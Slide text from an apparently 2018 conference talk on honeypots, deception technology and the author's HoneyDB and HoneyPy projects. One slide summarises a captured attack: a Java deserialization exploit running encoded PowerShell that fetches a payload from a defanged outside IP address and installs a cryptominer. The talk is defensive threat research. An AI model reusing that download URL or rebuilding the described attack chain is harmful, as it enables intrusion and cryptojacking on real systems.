Presented on May 9, 2018 at SOURCE Conference Boston
(https://sourceconference.com/events/bos18/).
This version contains minor updates from previous presentations.
This talk will provide a quick overview honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.
2. BIO
Career Summary
● WebDev, DBA, SA, IT Auditor (~7 yrs)
● AppSec in Financials, EY & GS (~9 yrs)
On the socials
● Twitter: @foospidy
● Github: http://github.com/foospidy
● LinkedIn: http://linkedin.pxmx.io
● Blog: http://pxmx.io
Phillip Maddux
Trusted AppSec Advisor and
Senior Solutions Engineer
@ Signal Sciences
https://signalsciences.com
SOURCE Boston 2018
4. Honeypots 101
A networked computer configured to look like a legitimate system, but its real
purpose is to discover and/or track attackers.
Types of Honeypots:
- Production
- Research
Levels of Interaction:
Low Emulated services, very limited interaction, no login capability (low risk).
Medium Emulated services, emulated login, emulated commands.
High Actual services, system logins, and commands (very risky).
5. Honeypots 101 - Production Honeypots
Production honeypots are computers on the network that have no legitimate
business purpose and should never see any traffic, unless…
- Something is misconfigured on the network
- A malicious actor on the network
Production honeypots are an additional layer to your defense strategy.
- Honeypot logs are low volume and high value
- Honeypots introduce risk to the attacker
7. Honeypots 101 - Production Honeypots
Additional Layer to…
Preventative controls
- Network & application firewalls
- Intrusion prevention systems
- Patch management
- Network compartmentalization
- Anti-virus
Detective controls
- Intrusion detection systems
- Network traffic analysis
- Endpoint monitoring
Control validation
- Vulnerability scans
- Audits
- Penetration testing
- Control performance monitoring
Honeypots
- Produces low volumes of data
compared to the volumes of data
from all other preventative and
detective controls
8. Honeypots 101 - Research Honeypots
Research honeypots can have many purposes, it just depends on what the
research goals are.
Examples:
- Identify sources of malicious traffic
- Discover active malware, botnets, and C&C servers
- Learn about attacker techniques & tools
9. Honeypots 101 - Research Honeypots
Bots
Scanners
Malware
DDoS Botnets
etc.
Internet
10. Honeypots 101 - Research Honeypots
ShmooCon 2015
Andrew Morris (@Andrew___Morris): No Budget Threat
Intelligence - Tracking Malware Campaigns on the Cheap
- Reversing malware
- Uncovering c2 servers
- Uncovering imminent ddos attacks
Presentation video
Now doing really cool stuff with…
(https://greynoise.io/)
11. Honeypots 101 - Hobbyist Honeypots
- Try it out.
- It’s fun!
This is not me.
(this is totally me)
15. Deception
Deception technology automates the creation of traps (decoys) and/or lures
which are mixed among and within existing IT resources to provide a layer of
protection to stop attackers that have penetrated the network. Traps (decoys) are
IT assets that either use real licensed operating system software, or are
emulations of these devices. [1]
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
16. Deception Automation
Automation for:
- Deploying deception endpoints as VMs, containers, or processes.
- Configuration of deception endpoints.
Centralized management interface, or API driven.
17. Deception Lures
Lures (aka breadcrumbs) - Lures are generally real information technology
resources (files of varying kinds) which are placed on actual IT assets. [1]
- Credentials to network resources or applications.
- Shortcuts to applications or other services, e.g. FTP, Telnet, SSH.
- Browser artifacts, e.g. history, favorites, cookies.
- Database connection strings
- Network drives
- etc.
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
19. Deception Layers
Network services - SSH, Telnet, FTP, etc.
Applications - cookies, directories, logins, functionality, etc.
Data - watermarks, triggers, records access, etc.
20. Deception in Applications
2017
Herb Todd: Tangled Web: Defense in Deception
- The goals of deception from the perspective of both the attacker and defender
- The elements and processes needed to plan, prepare, execute, and monitor effective deception
- The types of deception techniques that are effective and how they translate into actual web
application capabilities
- How to identify and respond to various types of attackers.
Presentation video
My takeaway - a tailored solution is needed
23. Deception Market
Approximately 20 companies
Raised at least 201 million dollars
Top 5 funded range 19 million to 46 million
2 acquisitions
All this over the last 4, maybe 5 years
Numbers based on data from crunchbase.com as of Fall 2017
24. Deception Challenges
The concept of honeypots
& deception has been
around for years
The Cuckoo’s Egg - 1989
Bsides Raleigh 2017 (now Bsides RDU) source
27. Deception Challenges
Over the last 10 to 15 years organizations have focused on
getting the basics done…
● Vulnerability Assessment
● Patch Management
● Endpoint protection
● Network Monitoring (IDS/IPS)
● Controls Validation
● Security awareness / training
Deception
● No resources
● Not a priority
● Not fully understood
28. Deception Challenges
However, as organizations are becoming more mature in their
security programs they are now thinking about deception…
What does a deception program look like for their
organization?
29. Deception Program
Initial thoughts…
● Scope… intruder vs. insider, or both?
● Output... alerts vs. counter intelligence, or both?
● Coverage… external vs. internal, or both?
● Assets… network, applications, data?
● Validation… metrics and testing.
● Incident response… integration and prioritization.
Audit & Compliance?
30. Deception Challenges
Some other challenges…
● Some existing solutions are heavy/complex to deploy (also operational
risk).
● Lures & breadcrumb management.
● Vulnerability scans reporting on sensors.
● Deception data risk (data is fake, incident is real).
● External facing deception can have an impact on security scorecard.
● How to implement deception in 3rd party vendor environments.
31. Deception Takeaways
Get the basics covered first
Think about your deception story (program)
Investigate solutions that are right sized for your organization’s maturity level
A solution needs to:
- have capability to be tailored
- be easy to deploy
- be easy to automate and integrate
- be light weight / low touch to manage
34. HoneyPy
- Low to medium interaction honeypot.
- Plugin based to implement various network services (tcp or udp).
- Open source, on Github https://github.com/foospidy/HoneyPy
- Written in Python.
- Plugins
- https://github.com/foospidy/HoneyPy/tree/master/plugins
- Service config
- https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg
- Integrations (loggers)
- https://github.com/foospidy/HoneyPy/tree/master/loggers
35. HoneyDB
HoneyDB is a community driven honeypot data aggregation
service. HoneyDB collects and publishes honeypot data via
its web site and APIs.
honeydb.io
(redirects to riskdiscovery.com/honeydb)
53. HoneyDB - Frankenstein Cloud Architecture
Serverless
(functions)
Google Cloud
BigQuery
PubSub
Novcon VMs
Honeydb web / api
MySQL
(Secondary)
MySQL
(Primary)
get hmac
post events
post eventspull events
pull tweets
Redis - API
Request
Limiting
replicate
query
inserts
stream
events
Coming
soon
56. HoneyDB - Note On Serverless Functions
IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost.
AWS Lambda is good - robust, but expensive… API gateway charges.
Google Cloud Functions is disappointing - easy
to deploy, only nodejs, but… Google functions
using Google library talking to Google PubSub
resulted in tons of errors. Wait. What? Why?
Azure Cloud Functions is WTF - couldn’t get
dependencies to install, never got it running,
couldn’t waste more time with it.
60. HoneyDB - How To Money?
Not practical, but wrote a cool script...
HoneyMiner
https://github.com/foospidy/HoneyMiner
61. HoneyDB - How To Money?
Masternodes…
Greater privacy of transactions
Performing immediate transactions
Participation in proceedings and voting
Activate budgeting and cashier system in cryptocurrencies
62. HoneyDB - How To Money?
Currently running 5 masternodes
across 2 VPS
Yields about $100 to $200 per month.
63. HoneyDB - But that crypto though.
Masternodes have
potential, but requires
an initial investment,
and at the
mercy of market
volatility.
64. HoneyDB - How to money?
Other options…
Sponsorships
Commercial Licensing
65. HoneyDB - Back To HaaS
Tools to get you honeypotting
● Honeydb-agent
○ Like HoneyPy, but a binary
● API Endpoints
● HoneyDB CLI
66. HoneyDB - New API Client Wrapper and CLI
pip install honeydb
usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data] [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE] [--ip-address
IP_ADDRESS] [--from-id FROM_ID] [--pretty]
optional arguments:
-h, --help show this help message and exit
--bad-hosts Get bad hosts.
--sensor-data-count Get sensor data count.
--sensor-data Get sensor data.
--threatbin Get ThreatBin entries.
--twitter-threat-feed Get Twitter Threat Feed.
--mydata Filter on mydata.
--date DATE Date in format YYYY-MM-DD
--ip-address IP_ADDRESS IP address to filter on.
--from-id FROM_ID ID to continue retrieving sensor data.
--pretty Print JSON in pretty format.
71. HoneyDB - @MalwareMechanic
● I analyzed the initial POST you sent me. From there
was I was able to pull apart a scanner/worm/RAT!
● It appears to be GhostMiner to mine Monero!
74. HoneyDB - @MalwareMechanic
● This POST utilizes a Java deserialization
vulnerability to execute a base64 encoded
PowerShell command.
● This in turn downloads and executes a PowerShell
script (hxxp://123.59.68.172/Cache/DL.php).
● Installs a cryptominer via WMI.
● Attempts to stop the various services & tasks
before installing the new miner.
● Attempts to stop other miners.
● Attempts to stop processes listening on specific
ports.
● Also saw references to
powershell_reflective_mimikatz.
75. HoneyDB - Go Forth and Honeypot!
honeydb.io
Thanks!
Questions?